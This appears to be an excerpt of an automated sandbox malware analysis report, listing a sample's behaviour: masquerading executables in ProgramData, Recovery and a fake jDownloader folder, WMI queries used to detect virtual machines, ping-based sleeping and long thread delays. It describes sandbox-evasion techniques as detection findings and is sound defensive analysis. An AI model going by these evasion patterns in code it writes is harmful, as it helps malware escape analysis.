Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\SoftwareDistribution\cmd.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost			Jump to behavior

Source: C:\hyperComponentFontDhcp\Mscommon.exe	Memory allocated: 2A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Memory allocated: 1AC60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: BC0000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: 1A820000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: 1320000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: 1B1D0000 memory reserve \| memory write watch
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 3190000 memory reserve \| memory write watch
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 1B340000 memory reserve \| memory write watch
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 16F0000 memory reserve \| memory write watch
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 1B1C0000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: 1780000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: 1B660000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 17E0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 1B410000 memory reserve \| memory write watch
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 2F70000 memory reserve \| memory write watch
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 1B1B0000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: D40000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: 1AC50000 memory reserve \| memory write watch
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 1780000 memory reserve \| memory write watch
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 1B430000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: 2790000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: 1AB30000 memory reserve \| memory write watch
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: E80000 memory reserve \| memory write watch
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Memory allocated: 1A9B0000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: 930000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Memory allocated: 1A740000 memory reserve \| memory write watch

Source: C:\ProgramData\SoftwareDistribution\cmd.exe

Code function: 32_2_00007FFD9BB1FD11 sldt word ptr [eax]

32_2_00007FFD9BB1FD11

Source: C:\hyperComponentFontDhcp\Mscommon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599830
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599703
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599593
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599417
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599129
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599000
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 3600000
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 598844
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 598645
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 598437
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 598172
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 598061
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 597906
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 597760
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 596953
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 596719
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 596578
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 596250
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 596109
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595999
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595781
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595652
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595539
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595406
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595296
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595149
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 300000
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595031
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 594906
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 594797
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 594640
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 594303
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 594026
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593906
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593762
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593613
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593484
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593375
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593265
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593156
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592994
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592852
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592734
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592609
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592500
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592390
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592281
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592172
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592037
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 591906
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 591795
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 591661
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 591454
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 591302
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 590659
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 590507
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477
